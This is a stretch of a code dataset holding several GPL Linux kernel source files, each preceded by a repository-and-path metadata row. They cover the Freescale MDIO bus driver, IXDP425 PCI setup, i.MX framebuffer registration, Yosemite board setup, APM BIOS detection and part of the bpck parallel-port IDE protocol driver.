	snprintf(name, MII_BUS_ID_SIZE, "%s@%llx", np->name,
		(unsigned long long)taddr);
}
EXPORT_SYMBOL_GPL(fsl_pq_mdio_bus_name);
/*
 * Locate the TBIPA register for a gianfar-family MDIO node.
 * For classic gianfar nodes it lives inside the MAC register block
 * we were already handed; for eTSEC2 it sits in a second reg window
 * that must be mapped separately.  Returns NULL when gianfar support
 * is not built in or the node is of another flavour.
 */
static u32 __iomem *get_gfar_tbipa(struct fsl_pq_mdio __iomem *regs, struct device_node *np)
{
#if defined(CONFIG_GIANFAR) || defined(CONFIG_GIANFAR_MODULE)
	struct gfar __iomem *enet_regs;

	/*
	 * This is mildly evil, but so is our hardware for doing this.
	 * Also, we have to cast back to struct gfar because of
	 * definition weirdness done in gianfar.h.
	 */
	if (of_device_is_compatible(np, "fsl,gianfar-mdio") ||
	    of_device_is_compatible(np, "fsl,gianfar-tbi") ||
	    of_device_is_compatible(np, "gianfar")) {
		enet_regs = (struct gfar __iomem *)regs;
		return &enet_regs->tbipa;
	}

	if (of_device_is_compatible(np, "fsl,etsec2-mdio") ||
	    of_device_is_compatible(np, "fsl,etsec2-tbi"))
		return of_iomap(np, 1);
#endif
	return NULL;
}
/*
 * Walk all "ucc_geth" nodes and find the UCC whose register range
 * fully contains [start, end]; its cell-index (or legacy device-id)
 * is stored in *ucc_id.
 *
 * Returns 0 on success, -ENODEV when UCC support is not built in,
 * -EINVAL when no UCC matched, or the last of_address_to_resource()
 * error if one occurred.
 */
static int get_ucc_id_for_range(u64 start, u64 end, u32 *ucc_id)
{
#if defined(CONFIG_UCC_GETH) || defined(CONFIG_UCC_GETH_MODULE)
	struct device_node *np = NULL;
	int err = 0;

	for_each_compatible_node(np, NULL, "ucc_geth") {
		struct resource tempres;

		err = of_address_to_resource(np, 0, &tempres);
		if (err)
			continue;

		/* if our mdio regs fall within this UCC regs range */
		if ((start >= tempres.start) && (end <= tempres.end)) {
			/* Find the id of the UCC */
			const u32 *id;

			id = of_get_property(np, "cell-index", NULL);
			if (!id) {
				/* fall back to the older binding */
				id = of_get_property(np, "device-id", NULL);
				if (!id)
					continue;
			}

			*ucc_id = *id;

			return 0;
		}
	}

	if (err)
		return err;
	else
		return -EINVAL;
#else
	return -ENODEV;
#endif
}
/*
 * Probe: allocate and register an mii_bus for a PowerQUICC MDIO node.
 *
 * Steps: allocate priv + mii_bus, map the register window (adjusting
 * for bindings whose reg starts at miimcfg rather than the block
 * start), locate the TBIPA register (gianfar/eTSEC2 vs UCC), program
 * the TBI PHY address from a "tbi-phy" child node if present, then
 * register the bus with the OF MDIO layer.  Errors unwind in reverse
 * order via the goto ladder at the bottom.
 */
static int fsl_pq_mdio_probe(struct platform_device *ofdev)
{
	struct device_node *np = ofdev->dev.of_node;
	struct device_node *tbi;
	struct fsl_pq_mdio_priv *priv;
	struct fsl_pq_mdio __iomem *regs = NULL;
	void __iomem *map;
	u32 __iomem *tbipa;
	struct mii_bus *new_bus;
	int tbiaddr = -1;
	const u32 *addrp;
	u64 addr = 0, size = 0;
	int err;

	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
	if (!priv)
		return -ENOMEM;

	new_bus = mdiobus_alloc();
	if (!new_bus) {
		err = -ENOMEM;
		goto err_free_priv;
	}

	new_bus->name = "Freescale PowerQUICC MII Bus",
	new_bus->read = &fsl_pq_mdio_read,
	new_bus->write = &fsl_pq_mdio_write,
	new_bus->reset = &fsl_pq_mdio_reset,
	new_bus->priv = priv;
	fsl_pq_mdio_bus_name(new_bus->id, np);

	addrp = of_get_address(np, 0, &size, NULL);
	if (!addrp) {
		err = -EINVAL;
		goto err_free_bus;
	}

	/* Set the PHY base address */
	addr = of_translate_address(np, addrp);
	if (addr == OF_BAD_ADDR) {
		err = -EINVAL;
		goto err_free_bus;
	}

	map = ioremap(addr, size);
	if (!map) {
		err = -ENOMEM;
		goto err_free_bus;
	}
	priv->map = map;

	/* These bindings point reg at miimcfg, not at the start of the
	 * fsl_pq_mdio block, so back the pointer up accordingly. */
	if (of_device_is_compatible(np, "fsl,gianfar-mdio") ||
			of_device_is_compatible(np, "fsl,gianfar-tbi") ||
			of_device_is_compatible(np, "fsl,ucc-mdio") ||
			of_device_is_compatible(np, "ucc_geth_phy"))
		map -= offsetof(struct fsl_pq_mdio, miimcfg);
	regs = map;
	priv->regs = regs;

	new_bus->irq = kcalloc(PHY_MAX_ADDR, sizeof(int), GFP_KERNEL);

	if (NULL == new_bus->irq) {
		err = -ENOMEM;
		goto err_unmap_regs;
	}

	new_bus->parent = &ofdev->dev;
	dev_set_drvdata(&ofdev->dev, new_bus);

	if (of_device_is_compatible(np, "fsl,gianfar-mdio") ||
			of_device_is_compatible(np, "fsl,gianfar-tbi") ||
			of_device_is_compatible(np, "fsl,etsec2-mdio") ||
			of_device_is_compatible(np, "fsl,etsec2-tbi") ||
			of_device_is_compatible(np, "gianfar")) {
		/* NOTE(review): for eTSEC2 this may be a fresh of_iomap()
		 * mapping that is never iounmap'd on later errors -- verify */
		tbipa = get_gfar_tbipa(regs, np);
		if (!tbipa) {
			err = -EINVAL;
			goto err_free_irqs;
		}
	} else if (of_device_is_compatible(np, "fsl,ucc-mdio") ||
			of_device_is_compatible(np, "ucc_geth_phy")) {
		u32 id;
		static u32 mii_mng_master;

		tbipa = &regs->utbipar;

		if ((err = get_ucc_id_for_range(addr, addr + size, &id)))
			goto err_free_irqs;

		/* first UCC found becomes the MII management master */
		if (!mii_mng_master) {
			mii_mng_master = id;
			ucc_set_qe_mux_mii_mng(id - 1);
		}
	} else {
		err = -ENODEV;
		goto err_free_irqs;
	}

	/* look for a "tbi-phy" child carrying the TBI PHY address */
	for_each_child_of_node(np, tbi) {
		if (!strncmp(tbi->type, "tbi-phy", 8))
			break;
	}

	if (tbi) {
		const u32 *prop = of_get_property(tbi, "reg", NULL);

		if (prop)
			tbiaddr = *prop;

		if (tbiaddr == -1) {
			err = -EBUSY;
			goto err_free_irqs;
		} else {
			out_be32(tbipa, tbiaddr);
		}
	}

	err = of_mdiobus_register(new_bus, np);
	if (err) {
		printk (KERN_ERR "%s: Cannot register as MDIO bus\n",
				new_bus->name);
		goto err_free_irqs;
	}

	return 0;

err_free_irqs:
	kfree(new_bus->irq);
err_unmap_regs:
	iounmap(priv->map);
err_free_bus:
	kfree(new_bus);
err_free_priv:
	kfree(priv);
	return err;
}
/*
 * Remove: unregister the bus, then release everything probe set up
 * (register mapping, mii_bus, private data).
 */
static int fsl_pq_mdio_remove(struct platform_device *ofdev)
{
	struct mii_bus *bus = dev_get_drvdata(&ofdev->dev);
	struct fsl_pq_mdio_priv *priv = bus->priv;

	mdiobus_unregister(bus);

	dev_set_drvdata(&ofdev->dev, NULL);

	iounmap(priv->map);
	bus->priv = NULL;
	mdiobus_free(bus);
	kfree(priv);

	return 0;
}
/* Device-tree bindings handled by this driver (gianfar, eTSEC2, UCC). */
static struct of_device_id fsl_pq_mdio_match[] = {
	{
		.type = "mdio",
		.compatible = "ucc_geth_phy",
	},
	{
		.type = "mdio",
		.compatible = "gianfar",
	},
	{
		.compatible = "fsl,ucc-mdio",
	},
	{
		.compatible = "fsl,gianfar-tbi",
	},
	{
		.compatible = "fsl,gianfar-mdio",
	},
	{
		.compatible = "fsl,etsec2-tbi",
	},
	{
		.compatible = "fsl,etsec2-mdio",
	},
	{},
};
MODULE_DEVICE_TABLE(of, fsl_pq_mdio_match);

static struct platform_driver fsl_pq_mdio_driver = {
	.driver = {
		.name = "fsl-pq_mdio",
		.owner = THIS_MODULE,
		.of_match_table = fsl_pq_mdio_match,
	},
	.probe = fsl_pq_mdio_probe,
	.remove = fsl_pq_mdio_remove,
};

module_platform_driver(fsl_pq_mdio_driver);

MODULE_LICENSE("GPL");
| gpl-2.0 |
hiepgia/kernel_hlte_lollipop | arch/arm/mach-ixp4xx/ixdp425-pci.c | 5379 | 1914 | /*
* arch/arm/mach-ixp4xx/ixdp425-pci.c
*
* IXDP425 board-level PCI initialization
*
* Copyright (C) 2002 Intel Corporation.
* Copyright (C) 2003-2004 MontaVista Software, Inc.
*
* Maintainer: Deepak Saxena <dsaxena@plexity.net>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
*/
#include <linux/kernel.h>
#include <linux/pci.h>
#include <linux/init.h>
#include <linux/irq.h>
#include <linux/delay.h>
#include <asm/mach/pci.h>
#include <asm/irq.h>
#include <mach/hardware.h>
#include <asm/mach-types.h>
/* Number of PCI slots and interrupt lines on the IXDP425 board. */
#define MAX_DEV		4
#define IRQ_LINES	4

/* PCI controller GPIO to IRQ pin mappings */
#define INTA		11
#define INTB		10
#define INTC		9
#define INTD		8
/*
 * Configure the four PCI interrupt GPIOs as active-low level
 * interrupts before the common IXP4xx PCI setup runs.
 */
void __init ixdp425_pci_preinit(void)
{
	irq_set_irq_type(IXP4XX_GPIO_IRQ(INTA), IRQ_TYPE_LEVEL_LOW);
	irq_set_irq_type(IXP4XX_GPIO_IRQ(INTB), IRQ_TYPE_LEVEL_LOW);
	irq_set_irq_type(IXP4XX_GPIO_IRQ(INTC), IRQ_TYPE_LEVEL_LOW);
	irq_set_irq_type(IXP4XX_GPIO_IRQ(INTD), IRQ_TYPE_LEVEL_LOW);
	ixp4xx_pci_preinit();
}
/*
 * Map a PCI (slot, pin) pair onto one of the four GPIO interrupts.
 * The lines are rotated per slot (standard swizzle), so slot+pin
 * selects the table entry modulo 4.  Returns -1 for out-of-range
 * slots or pins.
 */
static int __init ixdp425_map_irq(const struct pci_dev *dev, u8 slot, u8 pin)
{
	static int pci_irq_table[IRQ_LINES] = {
		IXP4XX_GPIO_IRQ(INTA),
		IXP4XX_GPIO_IRQ(INTB),
		IXP4XX_GPIO_IRQ(INTC),
		IXP4XX_GPIO_IRQ(INTD)
	};

	if (slot < 1 || slot > MAX_DEV || pin < 1 || pin > IRQ_LINES)
		return -1;

	return pci_irq_table[(slot + pin - 2) % 4];
}
/* Board PCI description handed to the ARM PCI core. */
struct hw_pci ixdp425_pci __initdata = {
	.nr_controllers = 1,
	.preinit	= ixdp425_pci_preinit,
	.swizzle	= pci_std_swizzle,
	.setup		= ixp4xx_setup,
	.scan		= ixp4xx_scan_bus,
	.map_irq	= ixdp425_map_irq,
};
/*
 * Register the PCI controller, but only on the boards that share
 * this wiring (IXDP425 and its close relatives).
 */
int __init ixdp425_pci_init(void)
{
	if (machine_is_ixdp425() || machine_is_ixcdp1100() ||
			machine_is_ixdp465() || machine_is_kixrp435())
		pci_common_init(&ixdp425_pci);
	return 0;
}

subsys_initcall(ixdp425_pci_init);
| gpl-2.0 |
HeliumRom/android_kernel_nubia_nx507j | arch/arm/plat-mxc/devices/platform-imx-fb.c | 5635 | 1676 | /*
* Copyright (C) 2010 Pengutronix
* Uwe Kleine-Koenig <u.kleine-koenig@pengutronix.de>
*
* This program is free software; you can redistribute it and/or modify it under
* the terms of the GNU General Public License version 2 as published by the
* Free Software Foundation.
*/
#include <linux/dma-mapping.h>
#include <mach/hardware.h>
#include <mach/devices-common.h>
/* Build one imx_imx_fb_data entry from a SoC's LCDC base/irq macros. */
#define imx_imx_fb_data_entry_single(soc, _size)			\
	{								\
		.iobase = soc ## _LCDC_BASE_ADDR,			\
		.iosize = _size,					\
		.irq = soc ## _INT_LCDC,				\
	}

/* Per-SoC LCDC resource descriptions (register window size varies). */
#ifdef CONFIG_SOC_IMX1
const struct imx_imx_fb_data imx1_imx_fb_data __initconst =
	imx_imx_fb_data_entry_single(MX1, SZ_4K);
#endif /* ifdef CONFIG_SOC_IMX1 */

#ifdef CONFIG_SOC_IMX21
const struct imx_imx_fb_data imx21_imx_fb_data __initconst =
	imx_imx_fb_data_entry_single(MX21, SZ_4K);
#endif /* ifdef CONFIG_SOC_IMX21 */

#ifdef CONFIG_SOC_IMX25
const struct imx_imx_fb_data imx25_imx_fb_data __initconst =
	imx_imx_fb_data_entry_single(MX25, SZ_16K);
#endif /* ifdef CONFIG_SOC_IMX25 */

#ifdef CONFIG_SOC_IMX27
const struct imx_imx_fb_data imx27_imx_fb_data __initconst =
	imx_imx_fb_data_entry_single(MX27, SZ_4K);
#endif /* ifdef CONFIG_SOC_IMX27 */
/*
 * Register an "imx-fb" platform device for the given SoC's LCDC,
 * attaching its MMIO window and interrupt plus a copy of @pdata.
 * The device gets a 32-bit DMA mask for the framebuffer.
 */
struct platform_device *__init imx_add_imx_fb(
		const struct imx_imx_fb_data *data,
		const struct imx_fb_platform_data *pdata)
{
	struct resource res[] = {
		{
			.start = data->iobase,
			.end = data->iobase + data->iosize - 1,
			.flags = IORESOURCE_MEM,
		}, {
			.start = data->irq,
			.end = data->irq,
			.flags = IORESOURCE_IRQ,
		},
	};
	return imx_add_platform_device_dmamask("imx-fb", 0,
			res, ARRAY_SIZE(res),
			pdata, sizeof(*pdata), DMA_BIT_MASK(32));
}
| gpl-2.0 |
SlimRoms/kernel_samsung_crespo | arch/mips/pmc-sierra/yosemite/setup.c | 8963 | 6008 | /*
* Copyright (C) 2003 PMC-Sierra Inc.
* Author: Manish Lachwani (lachwani@pmc-sierra.com)
*
* Copyright (C) 2004 by Ralf Baechle (ralf@linux-mips.org)
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*
* THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
* WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN
* NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
* USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
* ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 675 Mass Ave, Cambridge, MA 02139, USA.
*/
#include <linux/bcd.h>
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/types.h>
#include <linux/mm.h>
#include <linux/bootmem.h>
#include <linux/swap.h>
#include <linux/ioport.h>
#include <linux/sched.h>
#include <linux/interrupt.h>
#include <linux/timex.h>
#include <linux/termios.h>
#include <linux/tty.h>
#include <linux/serial.h>
#include <linux/serial_core.h>
#include <linux/serial_8250.h>
#include <asm/time.h>
#include <asm/bootinfo.h>
#include <asm/page.h>
#include <asm/io.h>
#include <asm/irq.h>
#include <asm/processor.h>
#include <asm/reboot.h>
#include <asm/serial.h>
#include <asm/titan_dep.h>
#include <asm/m48t37.h>
#include "setup.h"
/* Board-default base MAC address for the Titan gigabit Ethernet ports. */
unsigned char titan_ge_mac_addr_base[6] = {
	// 0x00, 0x03, 0xcc, 0x1d, 0x22, 0x00
	0x00, 0xe0, 0x04, 0x00, 0x00, 0x21
};
unsigned long cpu_clock_freq;		/* CPU clock in Hz; presumably set by boot firmware - TODO confirm */
unsigned long yosemite_base;
static struct m48t37_rtc *m48t37_base;	/* ioremap()ed M48T37 RTC registers, see py_rtc_setup() */
/* No board-specific bus-error setup is required on this platform. */
void __init bus_error_init(void)
{
	/* Do nothing */
}
/*
 * Read the wall-clock time from the M48T37 RTC into @ts.
 *
 * Writing 0x40 to the control register stops the clock registers from
 * updating so that a consistent snapshot can be read; writing 0x00
 * resumes updates.  All RTC registers are BCD-encoded.  The chip has no
 * sub-second resolution, so tv_nsec is always 0.
 */
void read_persistent_clock(struct timespec *ts)
{
	unsigned int year, month, day, hour, min, sec;
	unsigned long flags;

	spin_lock_irqsave(&rtc_lock, flags);

	/* Stop the update to the time */
	m48t37_base->control = 0x40;

	year = bcd2bin(m48t37_base->year);
	year += bcd2bin(m48t37_base->century) * 100;
	month = bcd2bin(m48t37_base->month);
	day = bcd2bin(m48t37_base->date);
	hour = bcd2bin(m48t37_base->hour);
	min = bcd2bin(m48t37_base->min);
	sec = bcd2bin(m48t37_base->sec);

	/* Start the update to the time again */
	m48t37_base->control = 0x00;

	spin_unlock_irqrestore(&rtc_lock, flags);

	ts->tv_sec = mktime(year, month, day, hour, min, sec);
	ts->tv_nsec = 0;
}
/*
 * Write the time @tim (seconds since the epoch) to the M48T37 RTC.
 *
 * Control register value 0x80 enables writes to the clock registers;
 * 0x00 re-latches them.  All values are stored BCD-encoded.
 * Always returns 0.
 */
int rtc_mips_set_time(unsigned long tim)
{
	struct rtc_time tm;
	unsigned long flags;

	/*
	 * Convert to a more useful format -- note months count from 0
	 * and years from 1900
	 */
	rtc_time_to_tm(tim, &tm);
	tm.tm_year += 1900;
	tm.tm_mon += 1;

	spin_lock_irqsave(&rtc_lock, flags);

	/* enable writing */
	m48t37_base->control = 0x80;

	/* year */
	m48t37_base->year = bin2bcd(tm.tm_year % 100);
	m48t37_base->century = bin2bcd(tm.tm_year / 100);

	/* month */
	m48t37_base->month = bin2bcd(tm.tm_mon);

	/* day */
	m48t37_base->date = bin2bcd(tm.tm_mday);

	/* hour/min/sec */
	m48t37_base->hour = bin2bcd(tm.tm_hour);
	m48t37_base->min = bin2bcd(tm.tm_min);
	m48t37_base->sec = bin2bcd(tm.tm_sec);

	/* day of week -- not really used, but let's keep it up-to-date */
	m48t37_base->day = bin2bcd(tm.tm_wday + 1);

	/* disable writing */
	m48t37_base->control = 0x00;

	spin_unlock_irqrestore(&rtc_lock, flags);
	return 0;
}
/*
 * Set the MIPS count/compare timer frequency.
 *
 * The original code first assigned cpu_clock_freq / 2 and then
 * immediately overwrote it with the fixed 495 MHz (33 MHz * 3 * 5)
 * value, making the first assignment a dead store.  Keep only the
 * value that was actually in effect.
 */
void __init plat_time_init(void)
{
	mips_hpt_frequency = 33000000 * 3 * 5;
}
unsigned long ocd_base;
EXPORT_SYMBOL(ocd_base);
/*
* Common setup before any secondaries are started
*/
#define TITAN_UART_CLK 3686400
#define TITAN_SERIAL_BASE_BAUD (TITAN_UART_CLK / 16)
#define TITAN_SERIAL_IRQ 4
#define TITAN_SERIAL_BASE 0xfd000008UL
/*
 * Map the on-chip device (OCD) register window.  The mapping is
 * required for all further OCD_READ/OCD_WRITE accesses, so failure
 * is fatal.
 */
static void __init py_map_ocd(void)
{
	ocd_base = (unsigned long) ioremap(OCD_BASE, OCD_SIZE);
	if (!ocd_base)
		panic("Mapping OCD failed - game over. Your score is 0.");

	/* Kludge for PMON bug ... */
	OCD_WRITE(0x0710, 0x0ffff029);
}
static void __init py_uart_setup(void)
{
#ifdef CONFIG_SERIAL_8250
	/*
	 * Describe the on-chip Titan UART to the 8250 core and register
	 * it as line 0.  The interrupt is shared with the serial driver,
	 * which we don't properly support yet.
	 */
	struct uart_port up = {
		.membase	= (unsigned char *) ioremap(TITAN_SERIAL_BASE, 8),
		.irq		= TITAN_SERIAL_IRQ,
		.uartclk	= TITAN_UART_CLK,
		.regshift	= 0,
		.iotype		= UPIO_MEM,
		.flags		= UPF_BOOT_AUTOCONF | UPF_SKIP_TEST,
		.line		= 0,
	};

	if (early_serial_setup(&up))
		printk(KERN_ERR "Early serial init of port 0 failed\n");
#endif /* CONFIG_SERIAL_8250 */
}
/* Map the M48T37 RTC register window; only warn on failure. */
static void __init py_rtc_setup(void)
{
	m48t37_base = ioremap(YOSEMITE_RTC_BASE, YOSEMITE_RTC_SIZE);
	if (m48t37_base == NULL)
		printk(KERN_ERR "Mapping the RTC failed\n");
}
/* Not only time init but that's what the hook it's called through is named */
static void __init py_late_time_init(void)
{
	/* Order matters: the OCD mapping must exist before the UART/RTC code. */
	py_map_ocd();
	py_uart_setup();
	py_rtc_setup();
}
/*
 * Board memory setup: defer device init to late_time_init and register
 * the 256 MB of RAM at physical address 0.
 */
void __init plat_mem_setup(void)
{
	late_time_init = py_late_time_init;

	/* Add memory regions */
	add_memory_region(0x00000000, 0x10000000, BOOT_MEM_RAM);

#if 0 /* XXX Crash ... */
	OCD_WRITE(RM9000x2_OCD_HTSC,
		  OCD_READ(RM9000x2_OCD_HTSC) | HYPERTRANSPORT_ENABLE);

	/* Set the BAR. Shifted mode */
	OCD_WRITE(RM9000x2_OCD_HTBAR0, HYPERTRANSPORT_BAR0_ADDR);
	OCD_WRITE(RM9000x2_OCD_HTMASK0, HYPERTRANSPORT_SIZE0);
#endif
}
| gpl-2.0 |
samno1607/LG-P920-Stock-Gingerbread-Kernel | arch/x86/boot/apm.c | 14339 | 1961 | /* -*- linux-c -*- ------------------------------------------------------- *
*
* Copyright (C) 1991, 1992 Linus Torvalds
* Copyright 2007 rPath, Inc. - All Rights Reserved
* Copyright 2009 Intel Corporation; author H. Peter Anvin
*
* Original APM BIOS checking by Stephen Rothwell, May 1994
* (sfr@canb.auug.org.au)
*
* This file is part of the Linux kernel, and is made available under
* the terms of the GNU General Public License version 2.
*
* ----------------------------------------------------------------------- */
/*
* Get APM BIOS information
*/
#include "boot.h"
/*
 * Detect an APM BIOS, establish the 32-bit protected-mode connection
 * (int 0x15, ah = 0x53) and record the returned segment/entry-point
 * information in boot_params.apm_bios_info.
 *
 * Returns 0 on success, -1 if there is no usable 32-bit APM BIOS.
 */
int query_apm_bios(void)
{
	struct biosregs ireg, oreg;

	/* APM BIOS installation check */
	initregs(&ireg);
	ireg.ah = 0x53;
	intcall(0x15, &ireg, &oreg);

	if (oreg.flags & X86_EFLAGS_CF)
		return -1;		/* No APM BIOS */

	if (oreg.bx != 0x504d)		/* "PM" signature */
		return -1;

	if (!(oreg.cx & 0x02))		/* 32 bits supported? */
		return -1;

	/* Disconnect first, just in case */
	ireg.al = 0x04;
	intcall(0x15, &ireg, NULL);

	/* 32-bit connect */
	ireg.al = 0x03;
	intcall(0x15, &ireg, &oreg);

	boot_params.apm_bios_info.cseg = oreg.ax;
	boot_params.apm_bios_info.offset = oreg.ebx;
	boot_params.apm_bios_info.cseg_16 = oreg.cx;
	boot_params.apm_bios_info.dseg = oreg.dx;
	boot_params.apm_bios_info.cseg_len = oreg.si;
	boot_params.apm_bios_info.cseg_16_len = oreg.hsi;
	boot_params.apm_bios_info.dseg_len = oreg.di;

	if (oreg.flags & X86_EFLAGS_CF)
		return -1;

	/* Redo the installation check as the 32-bit connect;
	   some BIOSes return different flags this way... */
	ireg.al = 0x00;
	intcall(0x15, &ireg, &oreg);

	if ((oreg.eflags & X86_EFLAGS_CF) || oreg.bx != 0x504d) {
		/* Failure with 32-bit connect, try to disconnect and ignore */
		ireg.al = 0x04;
		intcall(0x15, &ireg, NULL);
		return -1;
	}

	boot_params.apm_bios_info.version = oreg.ax;
	boot_params.apm_bios_info.flags = oreg.cx;
	return 0;
}
| gpl-2.0 |
javelinanddart/bricked-flo | drivers/block/paride/bpck.c | 14851 | 9505 | /*
bpck.c (c) 1996-8 Grant R. Guenther <grant@torque.net>
Under the terms of the GNU General Public License.
bpck.c is a low-level protocol driver for the MicroSolutions
"backpack" parallel port IDE adapter.
*/
/* Changes:
1.01 GRG 1998.05.05 init_proto, release_proto, pi->delay
1.02 GRG 1998.08.15 default pi->delay returned to 4
*/
#define BPCK_VERSION "1.02"
#include <linux/module.h>
#include <linux/init.h>
#include <linux/delay.h>
#include <linux/kernel.h>
#include <linux/types.h>
#include <linux/wait.h>
#include <asm/io.h>
#include "paride.h"
#undef r2
#undef w2
#define PC pi->private
#define r2() (PC=(in_p(2) & 0xff))
#define w2(byte) {out_p(2,byte); PC = byte;}
#define t2(pat) {PC ^= pat; out_p(2,PC);}
#define e2() {PC &= 0xfe; out_p(2,PC);}
#define o2() {PC |= 1; out_p(2,PC);}
#define j44(l,h) (((l>>3)&0x7)|((l>>4)&0x8)|((h<<1)&0x70)|(h&0x80))
/* cont = 0 - access the IDE register file
cont = 1 - access the IDE command set
cont = 2 - use internal bpck register addressing
*/
static int cont_map[3] = { 0x40, 0x48, 0 };
/*
 * Read one register through the backpack adapter.  @cont selects the
 * addressing space (see cont_map) and @regr the register within it.
 * Mode 0 is 4-bit nibble mode (two status reads joined via j44()),
 * mode 1 is 8-bit, modes 2-4 use EPP transfers.
 */
static int bpck_read_regr( PIA *pi, int cont, int regr )

{	int r, l, h;

	r = regr + cont_map[cont];

	switch (pi->mode) {

	case 0: w0(r & 0xf); w0(r); t2(2); t2(4);
		l = r1();
		t2(4);
		h = r1();
		return j44(l,h);

	case 1: w0(r & 0xf); w0(r); t2(2);
		e2(); t2(0x20);
		t2(4); h = r0();
		t2(1); t2(0x20);
		return h;

	case 2:
	case 3:
	case 4: w0(r); w2(9); w2(0); w2(0x20);
		h = r4();
		w2(0);
		return h;

	}
	return -1;	/* unsupported mode */
}
/*
 * Write @val to one register through the backpack adapter; @cont and
 * @regr select the register as in bpck_read_regr().
 */
static void bpck_write_regr( PIA *pi, int cont, int regr, int val )

{	int r;

	r = regr + cont_map[cont];

	switch (pi->mode) {

	case 0:
	case 1: w0(r);
		t2(2);
		w0(val);
		o2(); t2(4); t2(1);
		break;

	case 2:
	case 3:
	case 4: w0(r); w2(9); w2(0);
		w0(val); w2(1); w2(3); w2(0);
		break;

	}
}
/* These macros access the bpck registers in native addressing */
#define WR(r,v) bpck_write_regr(pi,2,r,v)
#define RR(r) (bpck_read_regr(pi,2,r))
/*
 * Write @count bytes from @buf to the device in the current mode.
 * Modes 3 and 4 transfer 16 and 32 bits at a time respectively, so
 * @count is assumed to be suitably aligned for those modes.
 */
static void bpck_write_block( PIA *pi, char * buf, int count )

{	int i;

	switch (pi->mode) {

	case 0: WR(4,0x40);
		w0(0x40); t2(2); t2(1);
		for (i=0;i<count;i++) { w0(buf[i]); t2(4); }
		WR(4,0);
		break;

	case 1: WR(4,0x50);
		w0(0x40); t2(2); t2(1);
		for (i=0;i<count;i++) { w0(buf[i]); t2(4); }
		WR(4,0x10);
		break;

	case 2: WR(4,0x48);
		w0(0x40); w2(9); w2(0); w2(1);
		for (i=0;i<count;i++) w4(buf[i]);
		w2(0);
		WR(4,8);
		break;

	case 3: WR(4,0x48);
		w0(0x40); w2(9); w2(0); w2(1);
		for (i=0;i<count/2;i++) w4w(((u16 *)buf)[i]);
		w2(0);
		WR(4,8);
		break;

	case 4: WR(4,0x48);
		w0(0x40); w2(9); w2(0); w2(1);
		for (i=0;i<count/4;i++) w4l(((u32 *)buf)[i]);
		w2(0);
		WR(4,8);
		break;

	}
}
/*
 * Read @count bytes from the device into @buf in the current mode.
 * Modes 3 and 4 transfer 16 and 32 bits at a time respectively.
 */
static void bpck_read_block( PIA *pi, char * buf, int count )

{	int i, l, h;

	switch (pi->mode) {

	case 0: WR(4,0x40);
		w0(0x40); t2(2);
		for (i=0;i<count;i++) {
		    t2(4); l = r1();
		    t2(4); h = r1();
		    buf[i] = j44(l,h);
		}
		WR(4,0);
		break;

	case 1: WR(4,0x50);
		w0(0x40); t2(2); t2(0x20);
		for(i=0;i<count;i++) { t2(4); buf[i] = r0(); }
		t2(1); t2(0x20);
		WR(4,0x10);
		break;

	case 2: WR(4,0x48);
		w0(0x40); w2(9); w2(0); w2(0x20);
		for (i=0;i<count;i++) buf[i] = r4();
		w2(0);
		WR(4,8);
		break;

	case 3: WR(4,0x48);
		w0(0x40); w2(9); w2(0); w2(0x20);
		for (i=0;i<count/2;i++) ((u16 *)buf)[i] = r4w();
		w2(0);
		WR(4,8);
		break;

	case 4: WR(4,0x48);
		w0(0x40); w2(9); w2(0); w2(0x20);
		for (i=0;i<count/4;i++) ((u32 *)buf)[i] = r4l();
		w2(0);
		WR(4,8);
		break;

	}
}
/*
 * Probe for a backpack device with unit ID pi->unit on the port.
 * Returns 1 if a device answered, 0 otherwise.  The original port
 * register contents are restored before returning.
 */
static int bpck_probe_unit ( PIA *pi )

{	int o1, o0, f7, id;
	int t, s;

	id = pi->unit;
	s = 0;
	w2(4); w2(0xe); r2(); t2(2);
	o1 = r1()&0xf8;
	o0 = r0();
	w0(255-id); w2(4); w0(id);
	t2(8); t2(8); t2(8);
	t2(2); t = r1()&0xf8;
	f7 = ((id % 8) == 7);
	if ((f7) || (t != o1)) { t2(2); s = r1()&0xf8; }
	if ((t == o1) && ((!f7) || (s == o1))) {
		w2(0x4c); w0(o0);
		return 0;
	}
	t2(8); w0(0); t2(2); w2(0x4c); w0(o0);
	return 1;
}
/*
 * Claim the parallel port and select device pi->unit, configuring the
 * adapter for the currently selected transfer mode.  The data register
 * is saved so bpck_disconnect() can restore it.
 */
static void bpck_connect ( PIA *pi  )

{       pi->saved_r0 = r0();
	w0(0xff-pi->unit); w2(4); w0(pi->unit);
	t2(8); t2(8); t2(8);
	t2(2); t2(2);

	switch (pi->mode) {

	case 0: t2(8); WR(4,0);
		break;

	case 1: t2(8); WR(4,0x10);
		break;

	case 2:
	case 3:
	case 4: w2(0); WR(4,8);
		break;

	}

	WR(5,8);

	/* Extra setup for CD-ROM (PI_PCD) devices only */
	if (pi->devtype == PI_PCD) {
		WR(0x46,0x10);		/* fiddle with ESS logic ??? */
		WR(0x4c,0x38);
		WR(0x4d,0x88);
		WR(0x46,0xa0);
		WR(0x41,0);
		WR(0x4e,8);
		}
}
/* Deselect the device and restore the saved data register. */
static void bpck_disconnect ( PIA *pi )

{	w0(0);
	if (pi->mode >= 2) { w2(9); w2(0); } else t2(2);
	w2(0x4c); w0(pi->saved_r0);
}
